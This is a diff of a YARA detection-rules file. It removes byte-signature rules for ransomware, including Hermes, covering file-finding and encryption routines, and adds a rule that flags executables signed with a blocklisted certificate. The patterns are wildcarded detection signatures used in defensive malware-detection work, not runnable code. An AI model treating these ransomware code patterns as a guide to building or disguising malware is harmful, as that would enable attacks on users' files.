-            ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 75 02 EB 0D 83 7D ?? ?? 74 02 EB 05
-            E9 5C FE FF FF 83 7D ?? ?? 74 17 8B 4D ?? 3B 4D ?? 75 0F 8B 55 ?? 3B 55 ?? 75 07 C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 50 E8 ??
-            ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B
-            88 ?? ?? ?? ?? FF D1 6A ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ??
-            ?? FF D2 83 7D ?? ?? 74 0C 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 83 7D
-            ?? ?? 75 22 6A ?? 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 85 C0 75 07 C7 45 ?? ?? ?? ?? ?? 8B 45
-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 74 60 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ??
-            ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 89 45 ?? 83 7D ?? ?? 74 37 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ??
-            ?? ?? 52 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ??
-            ?? ?? FF D1 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 8B 45 ?? 5E 8B E5 5D C3
-        }
-		$v30_3_encrypt_file_1 = {
-            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 75 08 8B 45 ?? E9 48 04 00 00 83 7D ?? ?? 75 08 8B 45 ?? E9 3A 04 00
-            00 8B 45 ?? 83 78 ?? ?? 74 11 8B 4D ?? 83 39 ?? 74 09 8B 55 ?? 83 7A ?? ?? 75 08 8B 45 ?? E9 18 04 00 00 C7 45 ?? ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 89 45 ?? 6A ?? 8B 55
-            ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B
-            90 ?? ?? ?? ?? FF D2 89 45 ?? 83 7D ?? ?? 0F 84 90 03 00 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 0F 84
-            83 00 00 00 8B 45 ?? 8B 48 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 74 6B 6A ?? 8D 55 ?? 52 8B 45 ?? 8B 48 ??
-            51 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 74 39 8B 55 ?? 3B 15 ?? ?? ?? ?? 75 2E 8B 45 ??
-            8B 48 ?? 51 8B 55 ?? 8B 42 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 50 ?? FF D2 85 C0 75 0E C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 0F 84 9A 02 00 00 6A ?? 6A ?? 6A ?? 8B 4D ?? 51 E8 ?? ?? ?? ??
-            8B 90 ?? ?? ?? ?? FF D2 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 89 45 ?? 83 7D ?? ?? 0F 84 63 02 00 00
-            8B 55 ?? 3B 55 ?? 0F 87 57 02 00 00 8D 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 3F 02 00 00 6A ?? 6A
-        }
-		$v30_3_encrypt_file_2 = {
-            6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 89 45 ?? 83 7D ?? ?? 0F 84 0B 02 00
-            00 C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 81 E1 ?? ?? ?? ?? 74 1C 6A ?? 6A ?? 8B 15 ?? ?? ?? ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B
-            88 ?? ?? ?? ?? FF D1 C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ??
-            FF D0 85 C0 0F 84 52 01 00 00 C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 51 6A ?? 6A ?? 8B 55 ?? 8B 02 50 8B 4D ?? 8B 51 ?? 52 8B 45
-            ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 0F 84 0A 01 00 00 8B 55 ?? 8B 42 ?? 83 E8 ?? 89 45 ?? 8B 4D ?? D1 E1
-            89 4D ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 CC 00 00 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? 6A ?? 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 74 76 8B 55 ??
-            3B 55 ?? 73 07 C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 5F 8B 45 ?? 50 8D 4D ?? 51 8B 55 ?? 52 6A ?? 8B 45 ?? 50 6A ?? 8B 4D
-            ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 85 C0 74 21 6A ?? 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ??
-            ?? ?? 8B 88 ?? ?? ?? ?? FF D1 EB 15 83 7D ?? ?? 74 0D 83 7D ?? ?? 74 07 C7 45 ?? ?? ?? ?? ?? EB 0E EB 02 EB 0A 83 7D ??
-            ?? 0F 84 54 FF FF FF 83 7D ?? ?? 74 07 C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ??
-        }
-		$v30_3_encrypt_file_3 = {
-            ?? 8B 88 ?? ?? ?? ?? FF D1 6A ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 83 7D ?? ?? 75 47 8B 4D ?? 81 E1 ??
-            ?? ?? ?? 74 3C 6A ?? 6A ?? 6A ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 6A ?? 8D 4D ?? 51 8B 55 ?? 8B 42 ??
-            50 8B 4D ?? 8B 51 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ??
-            FF D0 EB 07 C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 83 7D ?? ?? 75 20 68 ?? ?? ?? ?? 8B
-            45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 07 C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45
-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? EB 07 C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0
-            8B 45 ?? 8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( ( $v30_entrypoint at pe.entry_point ) and $v30_api_load and $v30_calculate_hash and $v30_dll_load and $v30_1_find_file_1 and $v30_1_find_file_2 and $v30_1_encrypt_file_1 and $v30_1_encrypt_file_2 and $v30_1_encrypt_file_3 ) or ( ( $v30_entrypoint at pe.entry_point ) and $v30_api_load and $v30_calculate_hash and $v30_dll_load and $v30_2_find_file_1 and $v30_2_find_file_2 and $v30_2_encrypt_file_1 and $v30_2_encrypt_file_2 and $v30_2_encrypt_file_3 ) or ( ( $v20_entrypoint at pe.entry_point ) and $v30_api_load and $v30_calculate_hash and $v30_dll_load and $v30_2_find_file_1 and $v30_2_find_file_2 and $v20_1_encrypt_file_1 and $v20_1_encrypt_file_2 and $v20_1_encrypt_file_3 ) or ( ( $v30_entrypoint at pe.entry_point ) and $v30_api_load and $v30_calculate_hash and $v30_dll_load and $v30_3_find_file_1 and $v30_3_find_file_2 and $v30_3_encrypt_file_1 and $v30_3_encrypt_file_2 and $v30_3_encrypt_file_3 ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PET SERVICES d.o.o." and ( pe.signatures [ i ] . serial == "00:d5:69:0d:94:f1:53:15:e1:43:db:10:af:35:49:7d:c5" or pe.signatures [ i ] . serial == "d5:69:0d:94:f1:53:15:e1:43:db:10:af:35:49:7d:c5" ) and 1576195200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Hermes : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_8223C74185Add0927246F5E33Ebac467 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Hermes ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "1f1f363a-5be0-59e5-b1c1-5e277922790c"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "dfe87130-7b2f-5f8a-8c2d-8653c2bd0cd3"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Hermes.yara#L1-L284"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12704-L12722"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "6db95c422ee2f9dd8a1795031ee8d7d5ed84e16cde47512becc006b6a849e890"
+		logic_hash = "f700b4f7cdfda9f678c3a5259d4293640c50567ec277c5b3db69756534e2007f"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Hermes"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$hermes_find_files_v1_p1 = {
-            A5 A5 A5 8D BD ?? ?? ?? ?? 66 AB BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? A5 A5 66 A5 68 ??
-            ?? ?? ?? 8D BD ?? ?? ?? ?? 50 AB 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 65
-            ?? ?? 8B 5D ?? 8B FB 4F 4F 8D 47 ?? 66 8B 4F ?? 47 47 66 85 C9 75 ?? BE ?? ?? ?? ??
-            A5 A5 8D 8D ?? ?? ?? ?? 51 50 66 A5 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 89 45 ?? E8
-            ?? ?? ?? ?? 59 59 8B C8 E8 ?? ?? ?? ?? 8B CB 8B D0 E8 ?? ?? ?? ?? 2B C2 33 C9 83 7D
-            ?? ?? 66 89 0C 43 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ??
-            8B C1 6A ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15
-            ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ??
-            8B C1 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 FF 75
-            ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D 7D ?? A5 A5 A5 A5 33
-        }
-		$hermes_find_files_v1_p2 = {
-            C0 6A ?? 59 6A ?? 8D 7D ?? 66 AB BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? F3 A5 59 BE ?? ??
-            ?? ?? 8D BD ?? ?? ?? ?? F3 A5 BE ?? ?? ?? ?? 8D 7D ?? A5 A5 A5 A5 6A ?? 59 8D 7D ??
-            AB BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? F3 A5 8D BD ?? ?? ?? ?? AB AB 66 AB BE ?? ?? ??
-            ?? 8D 7D ?? A5 A5 A5 A5 33 C0 6A ?? 8D 7D ?? AB 59 BE ?? ?? ?? ?? 8D BD ?? ?? ?? ??
-            F3 A5 66 A5 8D BD ?? ?? ?? ?? AB BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? A5 A5 A5 A5 8D BD
-            ?? ?? ?? ?? AB AB AB 66 AB 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85
-            C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59
-            85 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59
-            59 85 C0 75 ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D
-            85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 45 ?? 50
-            8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 0F
-        }
-		$hermes_find_files_v1_p3 = {
-            84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ??
-            ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59
-            85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F
-            85 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85
-            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F
-            85 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D
-        }
-		$hermes_find_files_v1_p4 = {
-            45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 45
-            ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? F6 85
-            ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 53 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 8B C8 E8 ?? ?? ?? ?? 83 F8 ?? 7E ?? 53 FF 75
-            ?? FF 75 ?? E8
-        }
-		$hermes_encrypt_files_v1_p1 = {
-            55 8B EC 83 EC ?? 53 56 57 FF 75 ?? FF 15 ?? ?? ?? ?? BB ?? ?? ?? ?? 3B C3 74 ?? 53
-            FF 75 ?? FF 15 ?? ?? ?? ?? 33 F6 56 53 6A ?? 56 56 68 ?? ?? ?? ?? FF 75 ?? FF 15 ??
-            ?? ?? ?? 89 45 ?? 3B C6 0F 84 ?? ?? ?? ?? 8D 4D ?? 51 50 FF 15 ?? ?? ?? ?? 89 45 ??
-            83 F8 ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 82 ?? ?? ?? ?? 56 89 45 ?? 8D 45 ?? 50 56 56
-            6A ?? 56 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? BF ?? ?? ?? ?? 57 FF 75 ?? 56
-            FF 15 ?? ?? ?? ?? 89 45 ?? 3B C6 74 ?? 56 8D 4D ?? 51 FF 75 ?? 89 75 ?? 50 FF 75 ??
-            FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 8B 4D ?? 8D 44 08 ?? 80 38 ?? 75 ?? 80 78 ??
-            ?? 75 ?? 80 78 ?? ?? 75 ?? 80 78 ?? ?? 75 ?? 80 78 ?? ?? 75 ?? 80 78 ?? ?? 75 ?? FF
-            75 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 75 ?? FF 15 ?? ?? ?? ?? 33 C0 5F 5E 5B
-        }
-		$hermes_encrypt_files_v1_p2 = {
-            C9 C3 FF 75 ?? 8D 45 ?? 50 51 56 6A ?? 56 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 56
-            56 56 FF 75 ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 E8 ?? ?? ??
-            ?? 6A ?? 57 FF 75 ?? 88 45 ?? 56 FF 15 ?? ?? ?? ?? 8B F8 89 7D ?? 3B FE 74 ?? FF 75
-            ?? 0F BE 45 ?? 50 57 E8 ?? ?? ?? ?? 83 C4 ?? 56 8D 45 ?? 50 FF 75 ?? 89 75 ?? 57 FF
-            75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? BF ?? ?? ?? ?? 57 56 FF 75 ?? FF 15
-            ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 56 53 6A ?? 56 56 68 ?? ?? ?? ?? FF 75 ?? FF
-            15 ?? ?? ?? ?? 8B D8 3B DE 0F 84 ?? ?? ?? ?? 56 8D 45 ?? 50 FF 75 ?? 89 75 ?? FF 75
-            ?? 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 56 8D 45 ?? 50 6A ?? 68 ?? ?? ?? ??
-            53 89 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 57 56 FF
-            75 ?? FF 15 ?? ?? ?? ?? 33 C0 40 E9
-        }
-		$hermes_enum_resources_v1 = {
-            55 8B EC 83 EC ?? 53 56 57 8D 45 ?? 50 FF 75 ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 6A ?? 6A
-            ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? 6A ?? FF
-            15 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? FF 75 ?? 6A ?? 53 E8 ?? ?? ?? ?? 83 C4
-            ?? 8D 45 ?? 50 53 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B
-            43 ?? 66 83 38 ?? 8D 48 ?? 75 ?? 66 83 78 ?? ?? 75 ?? 6A ?? 51 E8 ?? ?? ?? ?? 59 59
-            85 C0 74 ?? 8B 43 ?? 8B D0 66 8B 08 40 40 66 85 C9 75 ?? 8B 7D ?? 2B C2 4F 4F 66 8B
-            4F ?? 47 47 66 85 C9 75 ?? 8B C8 C1 E9 ?? 8B F2 F3 A5 8B C8 83 E1 ?? F3 A4 8B 7D ??
-            4F 4F 66 8B 47 ?? 47 47 66 85 C0 75 ?? BE ?? ?? ?? ?? A5 8B 43 ?? 83 E0 ?? 3C ?? 0F
-            85 ?? ?? ?? ?? FF 75 ?? 53 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 33 C0 5F 5E
-            5B C9 C3 33 C0 40 EB
-        }
-		$hermes_encrypt_files_v2_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 33 C0 8D BD ?? ?? ?? ?? AB 33 DB 89 5D ?? AB AB
-            AB 8B 7D ?? 57 FF 15 ?? ?? ?? ?? BE ?? ?? ?? ?? 56 57 FF 15 ?? ?? ?? ?? 53 56 6A ??
-            53 53 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B F0 85 F6 75 ?? 53 FF 15 ?? ?? ?? ?? 33
-            C0 E9 ?? ?? ?? ?? 33 DB 33 C0 89 5D ?? 0F 57 C0 89 45 ?? 66 0F 13 45 ?? 83 FE ?? 74
-            ?? 8D 45 ?? 50 56 FF 15 ?? ?? ?? ?? 8D 45 ?? 50 56 FF 15 ?? ?? ?? ?? 8B 5D ?? 8B 45
-            ?? 83 FB ?? 75 ?? 85 C0 75 ?? 33 FF 47 E9 ?? ?? ?? ?? 83 65 ?? ?? 83 7D ?? ?? 77 ??
-            81 7D ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 6A ?? 6A ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ??
-            6A ?? 6A ?? 52 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 8B 4D ??
-            89 45 ?? 83 F9 ?? 72 ?? 77 ?? 81 7D ?? ?? ?? ?? ?? 76 ?? 6A ?? 6A ?? 51 FF 75 ?? E8
-            ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 89 45 ?? 3D ?? ?? ?? ?? 76 ??
-            C7 45 ?? ?? ?? ?? ?? EB ?? 8B 55 ?? 8B C1 81 C2 ?? ?? ?? ?? 83 D0 ?? 83 F8 ?? 77 ??
-            72 ?? 81 FA ?? ?? ?? ?? 77 ?? 6A ?? 6A ?? 51 FF 75 ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 52
-            50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 89 45 ?? EB ?? 83 F9
-        }
-		$hermes_encrypt_files_v2_p2 = {
-            77 ?? 72 ?? 81 7D ?? ?? ?? ?? ?? 73 ?? 8B 45 ?? EB ?? 8B 45 ?? 3D ?? ?? ?? ?? 0F 87
-            ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 77 ?? 0F 82 ?? ?? ?? ?? 83 7D ?? ??
-            0F 82 ?? ?? ?? ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 83 7D ?? ?? B8 ?? ?? ?? ?? 77 ?? 39
-            45 ?? 0F 86 ?? ?? ?? ?? 6A ?? 6A ?? FF 75 ?? 2B D8 53 56 89 5D ?? FF 15 ?? ?? ?? ??
-            83 F8 ?? 75 ?? 6A ?? 58 E9 ?? ?? ?? ?? 33 DB 8D 45 ?? 53 50 6A ?? 8D 85 ?? ?? ?? ??
-            89 5D ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A ?? EB ?? 8B C3 80 BC 05 ?? ?? ?? ??
-            ?? 75 ?? 80 BC 05 ?? ?? ?? ?? ?? 75 ?? 80 BC 05 ?? ?? ?? ?? ?? 75 ?? 80 BC 05 ?? ??
-            ?? ?? ?? 75 ?? 80 BC 05 ?? ?? ?? ?? ?? 75 ?? 80 BC 05 ?? ?? ?? ?? ?? 74 ?? 40 83 F8
-            ?? 72 ?? 53 53 53 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 6A ?? E9 ?? ?? ??
-            ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 58 6A ?? 66 89 45 ?? 58 66 89 45 ?? 6A ?? 58 66 89 45
-            ?? 33 C0 66 89 45 ?? 8D 45 ?? 50 57 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 6A ?? 68 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 57 56 89 1E E8 ?? ?? ??
-            ?? 57 56 E8 ?? ?? ?? ?? 8D 45 ?? 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 56 57 FF 15 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 53 56 FF 15 ?? ?? ?? ?? 6A ?? E9 ?? ?? ?? ?? 33 DB 8D 45
-        }
-		$hermes_encrypt_files_v2_p3 = {
-            50 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A ?? E9 ?? ?? ?? ??
-            39 5D ?? 77 ?? 81 7D ?? ?? ?? ?? ?? 77 ?? 53 53 68 ?? ?? ?? ?? FF 75 ?? FF 75 ?? E8
-            ?? ?? ?? ?? 89 5D ?? 5B 6A ?? 89 4D ?? 33 DB 89 45 ?? 89 55 ?? 5F EB ?? 8B 45 ?? 89
-            45 ?? 53 69 C0 ?? ?? ?? ?? 53 50 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 6A ?? E9 ?? ??
-            ?? ?? 53 8D 45 ?? 89 5D ?? 50 6A ?? 5F 57 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ??
-            85 C0 75 ?? 6A ?? E9 ?? ?? ?? ?? 53 53 53 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 6A ??
-            E9 ?? ?? ?? ?? 89 5D ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B
-            D8 85 DB 75 ?? 6A ?? E9 ?? ?? ?? ?? 8B 55 ?? 33 C9 33 C0 C7 45 ?? ?? ?? ?? ?? 89 4D
-            ?? 89 45 ?? 83 65 ?? ?? C7 45 ?? ?? ?? ?? ?? 3B CA 75 ?? 8B 4D ?? 89 4D ?? C7 45 ??
-            ?? ?? ?? ?? 33 C9 51 51 50 56 89 4D ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ??
-            6A ?? 8D 45 ?? 50 FF 75 ?? 53 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 33 C9 C7
-        }
-		$hermes_encrypt_files_v2_p4 = {
-            45 ?? ?? ?? ?? ?? 51 8D 45 ?? 50 51 51 FF 75 ?? 51 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0
